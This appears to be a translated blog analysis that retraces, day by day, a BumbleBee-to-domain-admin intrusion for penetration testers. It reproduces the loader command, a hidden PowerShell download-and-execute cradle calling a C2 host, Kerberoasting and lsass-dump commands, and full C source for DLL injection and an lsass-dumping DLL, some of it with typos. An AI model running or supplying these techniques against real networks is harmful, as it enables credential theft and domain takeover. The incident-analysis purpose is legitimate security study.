Title: Practical Restore--From Bumblebee Sample to Domain Control Administrator Technical Analysis

0 Introduction

Practical Case Restoration 《BumbleBee Roasts Its Way To Domain Admin》 The article describes a penetration case in detail, but the organizational structure of the article is based on the ATTCK framework, rather than organized according to the timeline logic. Therefore, it is difficult for penetration personnel to understand and learn the previous and subsequent processes. Here we will sort it out and restore the actual combat according to the timeline.

《BumbleBee Roasts Its Way To Domain Admin》 Original link

1 Day 1 (Day1)

1.1 Sample Delivery

It appears to be a machine in the target environment delivered via a download link in the mail. This sample is a password-free package. After decompression, release the file BC_invoice_Report_CORP_46.iso. When mounting this ISO file, an LNK file documents.lnk will be released, and a hidden malicious loader will be executed when double-clicking this shortcut. The goals of the shortcut are as follows:

C:\Windows\System32\cmd.exe /c start rundll32 namr.dll,ItalJob

1.1.1 rundll32 analysis

Using rundll32 to load and execute is a common penetration routine. You can execute programs in the dll, and you can generally also use it to obtain shells:

use exploit/windows/smb/smb_delivery

set srvhost 10.x.x.x

exploit

1.2 Loading the malicious program BumbleBee

The loader BumbleBee returns the Cobalt Strike Session. The attacker uses this Cobalt Strike shell to release wab.exe. The executable file will have wmi execution.

C:\Windows\System32\webm\wmiprvse.exe -secured -Embedding

wab.exe injects malicious code into the other two processes explorer.exe and rundll32.exe. According to the original text, we use remote thread injection and process injection using the classic Windows system call APIs such as OpenProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread. According to these descriptions, the attacker now has at least Administrator permissions. Generally, if he has Administrator permissions, he will have System permissions. Judging from the article description, the attacker uses getsystem to increase the authority. The code for remote thread injection example is as follows:

BOOL CreateRemoteThreadInjectDLL(DWORD dwProcessId, char* pszDllFileName){

HANDLE hProcess=NULL;

DWORD dwSize=0;

LPVOID pDllAddr=NULL;

FARPROC pFuncProcAddr=NULL;

hProcess=:OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);//Open the process and get the process handle

dwSize=1+ :lstrlen(pszDllFileName); //Get dll size

pDllAddr=:VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);//In the application

:WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL);//Write dll to memory

pFuncProAddr=:GetProcAddress(:GetModuleHandle('kernel32.dll'), 'LoadLibiaryA');//Get the function address of the function LoadLibraryA

HANDLE hRemoteThread=:CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, Null);//Create remote thread

:CloseHandle(hProcess);

return TRUE;

}

1.3 Collected host information

Attackers use a variety of commands to collect information about operating systems, networks, users, software, processes, domains, etc.

ipconfig /all #get network information including domain

ping -n 1 [domain] #test domain connectivity

net group 'domain admins' /domain #Get domain management group members

nslookup x.x.x.x #get x.x.x IP address

tasklist #get process information

systeminfo #get system information

wmic product get name,version #get software information

wmic /node'redacted process list brief #get process information

net view \\redacted\Files$ /all #Column remote server Files shared directory

dir \\redacted\c$\ #Column C disk directory

tasklist /v /s x.x.x.x #Remotely get x.x.x.x process details

net use

net group 'Domain computers' /domain

net group 'Enterprise admins' /domain

net group 'domain computers' /domain

net localgroup administrators

nltest /dclist

nltest /domain_trusts

ping -n 1 remote_ip

According to the commands executed above, the attacker has obtained the permissions or username and password of the remote server x.x.x.x.

1.4 Move horizontally to the server and continue to collect information

The original description uses the local admin account to move horizontally to a server through the RDP protocol, and releases AnyDesk.exe as a backdoor, and then starts to use adfind.exe to continue to collect information (according to the description, it seems that the server is within the domain):

cmd.exe /C af.exe -f '(objectcategory=person)' ad_users.txt

cmd.exe /C af.exe -f 'objectcategory=computer' ad_computers.txt

cmd.exe /C af.exe -sc trustdump trustdump.txt

cmd.exe /C af.exe -gcb -sc trustdump trustdump.txt

2 Day 2 (Day2)

2.1 Continue to collect information on the server

The attacker continued to log in to the server using RDP and uploaded VulnRecon, a tool designed specifically to identify the path to elevated permissions on Windows machines.

3 Day 4 (Day4)

3.1 Continue to collect information on the charged host

The attacker uploaded the VulnRecon tool and the Sysinternals tool tool kit on multiple machines on the charged host and in the environment, and continued to collect information using VulnRecon, adfind, procdump and other tools. Among them, they use remote services to execute procdump to extract the memory of lsass.exe to obtain credentials, and according to the description, they have obtained permissions to at least several hosts and at least one server. As of now, it seems that there is no access to management or higher permissions. The process of using adfind occurs on the original controlled host, and of course it is not ruled out on the new horizontally moved host.

cmd.exe /C adfind.exe -f '(objectcategory=person)' ad_users.txt

cmd.exe /C adfind.exe -f 'objectcategory=computer' ad_computers.txt

cmd.exe /C adfind.exe -f '(objectcategory=organizationalUnit)' ad_ous.txt

cmd.exe /C adfind.exe -sc trustdump trustdump.txt

3.1.1 VulnRecon Analysis

VulnRecon has an executable file and a dll, namely vulnrecon.exe and vulnrecon.dll, which are used to enumerate the methods of privilege escalation and information collection. It seems to be a custom tool to upload to the original controlled host. Of course, it is not ruled out on the new host that is moved horizontally.

#

#vulnrecon.dll PDB: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\standalone\Release\apphost.pdb

#vulnrecon.exe PDB: D:\work\rt\VulnRecon\VulnRecon\obj\Release\net5.0\VulnRecon.pdb

# command

vulnrecon.exe -v

vulnrecon.exe -o

vulnrecon.exe -FindVulnerability

vulnrecon.exe -i

vulnrecon.exe -m

cmd.exe /c vulnrecon.exe -FindVulnerability c:\programdata\log.txt

cmd.exe /c vulnrecon.exe -i c:\programdata\1.txt

cmd.exe /c vulnrecon.exe -o c:\programdata\out.txt

It seems that the escalation of power is to perform procdump to obtain lsass memory, which occurs on the original charged host.

### 3.2 Get the credentials in lsas. The file dumped according to the description is saved in ProgramData. It can be retrieved using net use and other methods, and uses mimikatz or pypykatz for cracking. These processes occur on those victim hosts and servers that were discovered from the original charged host and moved laterally to.

C:\programdata\procdump64.exe -accepteula -ma lsass.exe C:\ProgramData\lsass.dmp

4 Day 7 (Day7)

4.1 Continue to collect information on the charged server

The attacker continued to use VulnRecon to collect information on the server, and also used the Seatbelt tool (a commonly used information collection tool). According to the description, the server's local administrator privileges are used.

Seatbelt.exe -group=all -outputfile='C:\ProgramData\seatinfo.txt'

vulnrecon.exe -o

vulnrecon.exe -v

vulnrecon.exe -m

cmd.exe /c vulnrecon.exe -FindVulnerability c:\programdata\log.txt

5 Day 11 (Day11)

5.1 Bounce shell on the charged host

The attacker is constantly accused of executing powershell commands on the host and downloading the contents of executing a file:

C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))'

According to the default configuration character MZRE of cobalt strike found in a, it can be concluded that this is an instruction to connect to the C2 address. The attacker then acquires a charged host to the C2 controlled by the attacker.

 Then start injecting into other processes. According to the original description, several processes such as svchost.exe should be injected. The attacker then executed the powershell module Invoke-Kerberoast and started the kerberoasting attack. This place is still initiated from the host being charged.

#Parent process svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:36177/'); Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath C:\ProgramData\REDACTED\ps.txt -append -force -Encoding UTF8

# It can be seen that the output is hashcat mode, and the attack should be brute-force cracking using hashcat

5.1.1 kerberosting attack analysis

kerberoasting attack analysis is divided into two types: TGS-Kerberoasting and AS-Kerberoasting. It can be performed using rubeus.exe, msf, powershell. The things it obtains Net-NTLMHash can be cracked using hashcat and other tools to obtain ntlmhash or password.

5.2 Use Minidump for credential extraction

The attacker began to use minidump, a credential extraction method that can circumvent Kaspersky. This place is still initiated from the host being charged.

#Parent process svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

cmd.exe /C rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 968 C:\ProgramData\REDACTED\lsass.dmp full

5.2.1 Minidump analysis

The attacker began to use minidump, a credential extraction method that can circumvent Kaspersky. This place is still initiated from the host being charged.

#include stdio.h

#include Windows.h

#include tlhelp32.h

typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);

int GetLsassPid() {

PROCESSENTRY32 entry;

entry.dwSize=sizeof(PROCESSENTRY32);

HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);

if (Process32First(hSnapshot, entry)) {

while (Process32Next(hSnapshot, entry)) {

if (wcscmp(entry.szExeFile, L'lsass.exe')==0) {

return entry.th32ProcessID;

}

}

}

CloseHandle(hSnapshot);

return 0;

}

void GetDebugPrivilege()

{

BOOL fOk=FALSE;

HANDLE hToken;

if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, hToken))

{

TOKEN_PRIVILEGES tp;

tp.PrivilegeCount=1;

LookupPrivilegeValue(NULL, SE_DEBUG_NAME, tp.Privileges[0].Luid);

tp.Privileges[0].Attributes=true ? SE_PRIVILEGE_ENABLED : 0;

AdjustTokenPrivileges(hToken, FALSE, tp, sizeof(tp), NULL, NULL);

fOk=(GetLastError()==ERROR_SUCCESS);

CloseHandle(hToken);

}

}

void DumpLsass()

{

wchar_t ws[100];

_MiniDumpW MiniDumpW;

MiniDumpW=(_MiniDumpW)GetProcAddress(LoadLibrary(L'comsvcs.dll'), 'MiniDumpW');

swprintf(ws, 100, L'%u %hs', GetLsassPid(), 'c:\\windows\\temp\\temp.bin full');

GetDebugPrivilege();

MiniDumpW(0, 0, ws);

}

BOOL APIENTRY DllMain( HMODULE hModule,

DWORD ul_reason_for_call,

LPVOID lpReserved

)

{

switch (ul_reason_for_call)

{

case DLL_PROCESS_ATTACH:

DumpLsass();

break;

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

I have compiled this file myself, and I am here to thank the former A-Team bosses for the penetration technology vision and the spirit of foreign XPN giants who are willing to share.

Compilation and usage reference

5.3 Continue information collection on the charged host

Continue to use adfind to collect information on the initially charged host.

cmd.exe /C adfind.exe -f '(objectcategory=person)' ad_users.txt

cmd.exe /C adfind.exe -f 'objectcategory=computer' ad_computers.txt

cmd.exe /C adfind.exe -sc trustdump trustdump.txt

5.4 Execute powershell again on the initially charged machine, the same as before

The attacker is constantly accused of executing powershell commands on the host and downloading the contents of executing a file:

C:\Windows\system32\cmd.exe /C powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('http://a.b.c.d:80/a'))'

The above process is described in detail in 5.1 and will not be repeated.

5.5 Information collection on more machines

Execute the following command on more machines:

C:\Windows\system32\cmd.exe /C net accounts /domain

C:\Windows\system32\cmd.exe /C net view /all

C:\Windows\system32\cmd.exe /C whoami

C:\Windows\system32\cmd.exe /C net view \\x.x.x.x\ /all

C:\Windows\system32\cmd.exe /C wmic /node:x.x.x.x process list brief

C:\Windows\system32\cmd.exe /C net ''domain controllers' /domain

C:\Windows\system32\cmd.exe /C net nltest /dclist:[domain]

5.6 Two batch scripts

The attacker uploads and executes two scripts s.bat and w.bat, which can analyze and discover other targets within the environment.

# s.bat

echo off

for /f %%i in (servers.txt) do for /f 'tokens=2 delims=[]' %%j in ('ping -n 1 -4 '%%i'') do @echo %%j serv.log

# w.bat

@echo off

for /f %%i in (workers.txt) do for /f 'tokens=2 delims=[]' %%j in ('ping -n 1 -4 '%%i'') do @echo %%j work.log

5.7 Last

After the two scripts are run, a new cobalt strike session is run again on the initially charged machine. Then the attacker uses a service account to move horizontally and executes a cobalt strike session on the domain control. According to the original description, this is a weak password, which is blasted by the operation of cracking the net-ntlm hash value obtained by hashcat to crack tgs-kerberoasting. The attacker dumps lsass on the domain control. Exe's process memory can obtain domain admin permissions and break through domain control

Original source: https://www.cnblogs.com/KevinGeorge/p/16595912.html